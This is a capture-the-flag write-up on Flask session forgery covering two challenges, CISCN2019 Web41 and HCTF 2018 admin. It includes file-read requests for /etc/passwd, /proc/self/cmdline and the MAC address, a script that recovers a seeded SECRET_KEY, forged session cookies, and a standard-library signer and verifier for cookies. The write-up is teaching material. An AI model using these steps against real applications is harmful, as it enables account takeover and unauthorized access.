Flask session forgery


```bash
python3 session_encode.py encode -s 'secret_key' -t "{内容}"
```

```bash
python3 session_decode.py (session)
```

Session forgery tool: https://github.com/noraj/flask-session-cookie-manager

[CISCN2019 East-South China Regional] Web41

The url parameter fetches and returns Baidu's page, which suggests an arbitrary file read; try reading /etc/passwd.

Check the current process via /proc/self/cmdline:


It is a Python backend with its source in app.py, so read the source:

```python
# encoding:utf-8
# Challenge source as read from the target (Python 2: print statement, urllib.urlopen)

import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())                          # seeded with the host's MAC address
app.config['SECRET_KEY'] = str(random.random()*233)  # so the session key is predictable
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
        return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )
```

random is seeded with a fixed value (uuid.getnode(), i.e. the MAC address), so the random number it produces, and with it the SECRET_KEY, is deterministic.


Read /sys/class/net/eth0/address to obtain the MAC address:

```python
import uuid
import random

# MAC address read from /sys/class/net/eth0/address on the target
mac = "e6:5c:db:61:4f:fb"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)          # the same integer uuid.getnode() returns on the target
random.seed(mac)
# the target runs Python 2, whose str(float) keeps 12 significant digits;
# run this under Python 2 to reproduce the key exactly as the app formats it
randStr = str(random.random()*233)
print(randStr)
```

```bash
python3 session_decode.py eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.Y48pCw.jSI45FJchx1e5pmIMuxPxvo4m9E
{'username': b'www-data'}
```

```bash
python3 session_encode.py encode -s '204.939020002' -t "{'username': b'fuck'}"
eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.Z8AaaQ.PN1VAO71jMvkoNTMlg0JYHtYTV8
```

Send eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.Z8AaaQ.PN1VAO71jMvkoNTMlg0JYHtYTV8 as the session cookie to get the flag.

[HCTF 2018]admin

First register an account aaa, which yields the session:

```text
session=.eJw9kEGPgjAQhf_KZs4eoMrFxANJNVmTGVK30LQXg4hAATcBDVLjf9_GTTy_fN97M084XoZyrGF9G-7lAo7NGdZP-DrBGhIlnJFZS0xEhrcz9oeOmKm13dXEW4cs6xL5HZDrauxFSHzXGZUyo8QKrQ4SWay09JzcWeT7TssiQm4sMvEwsp2IpY54NWt37tBul6RMjzaeNcOH5yJjY6ddPGlZhZqJ0PAqJHbw3WJCee79vgBd5bntBl4LKMbhcrz9tuX1c4K2RaBdOhsrpkRtvSJriGFEViz9ZKflvklU5uvjJSqcydU1xZu3runzqvyYfmx2KKv_5Jr3PoA8z2EB97Ec3l-DMIDXH43ebGs.Z8AbCQ.IxiAnlonqkJOfwl9qXOTT_o8-v4
```

It decodes to:

```python
{'_fresh': True, '_id': b'9d3e5d7d9d922de7fab1a4933ee92479a2d541eee6ed8264978a9211c02ea7906c3d1e907e3482c7e2175ff202cc1a99f03c00a85cd5d857da44017f9d43875a', 'csrf_token': b'b74c52f409a5d5b7c96472d3a2b9ee2071c278a4', 'image': b'J5Qz', 'name': 'aaa', 'user_id': '10'}
```

Change aaa to admin; the secret_key, found in the source files as ckj123, is used to encode:

```text
.eJw9kEGLwjAQhf_KMmcPbbQXwUMhCivMlLixIbmItrVt2rhQldqI_32DC54f3_fezBMO56G6NrC8DfdqBoe2hOUTvk6whEwJb2TeEROJ4d2EbtcTM422m4Z455HlfSa_I_J9g07ExDe9UXtmlFig1VEmi4WWgZMbi3zba1kkyI1FJh5GdiOxvSdeT9qXPdr1nJRxaNNJM3wELjE29dqno5Z1rJmIDa9jYrvQLUaUpQv7IvR14NYreM2guA7nw-23qy6fE7QtIu33k7FizNQ6KPKWGCZkxTxM9lpu20zloT6do8KJfNNQunrrWnesq4_px-a7qv5PLkcXAjiWrr3ADO7Xanj_DeIIXn9tx21R.Z8Abxg.LkGVETvcR5s0IX3YFx0FXKI5hoY
```

Replace the session on the home page to get the flag.
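As an added illustration (not code from the write-up or from the flask-session-cookie-manager tool), the following reimplements with only the standard library the cookie format that Flask's SecureCookieSessionInterface produces for both challenges above: base64 payload, timestamp and HMAC. It shows why the session data is readable by anyone, and why a guessable SECRET_KEY, such as one seeded from the MAC address or a string like ckj123 left in the source, is all that stops session['username'] from being rewritten; verify_session is the check a defender would run against a candidate key. It assumes the itsdangerous 2.x layout (unix timestamps, salt cookie-session, HMAC-SHA1 key derivation) and handles only the bytes tag of Flask's TaggedJSONSerializer.

```python
import base64, hashlib, hmac, json, time, zlib

SALT = b"cookie-session"   # salt used by Flask's SecureCookieSessionInterface

def _b64d(s):              # urlsafe base64 without padding, as itsdangerous writes it
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _b64e(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def _tag(v):               # Flask's TaggedJSONSerializer stores bytes as {" b": base64}
    if isinstance(v, bytes):
        return {" b": base64.b64encode(v).decode()}
    return {k: _tag(x) for k, x in v.items()} if isinstance(v, dict) else v

def _untag(v):             # inverse of _tag (only the bytes tag is handled here)
    if isinstance(v, dict):
        if list(v) == [" b"]:
            return base64.b64decode(v[" b"])
        return {k: _untag(x) for k, x in v.items()}
    return v

def _signature(secret_key, signed):
    # key_derivation="hmac": cookie key = HMAC-SHA1(secret_key, salt), then
    # signature = HMAC-SHA1(cookie key, payload + "." + timestamp)
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(derived, signed, hashlib.sha1).digest())

def decode_payload(cookie):
    """Read the session data. No key is needed: the cookie is signed, not encrypted."""
    raw = _b64d(cookie.lstrip(".").split(".")[0])
    if cookie.startswith("."):         # leading "." marks a zlib-compressed payload
        raw = zlib.decompress(raw)
    return _untag(json.loads(raw))

def verify_session(cookie, secret_key):
    """Return (payload, unix_timestamp) if the signature matches secret_key, else None."""
    signed, _, sig = cookie.rpartition(".")
    if not hmac.compare_digest(sig, _signature(secret_key, signed.encode())):
        return None
    ts = int.from_bytes(_b64d(signed.rpartition(".")[2]), "big")
    return decode_payload(signed), ts

def sign_session(payload, secret_key, ts=None):
    """Build a cookie the way Flask does (uncompressed); anyone holding the key can."""
    t = int(time.time()) if ts is None else ts
    body = _b64e(json.dumps(_tag(payload), separators=(",", ":")).encode())
    signed = body + "." + _b64e(t.to_bytes((t.bit_length() + 7) // 8, "big"))
    return signed + "." + _signature(secret_key, signed.encode())
```

Feeding verify_session a cookie and a key candidate is the same test the application performs on every request; if a key derived from public information such as a MAC address passes it, the sessions are forgeable.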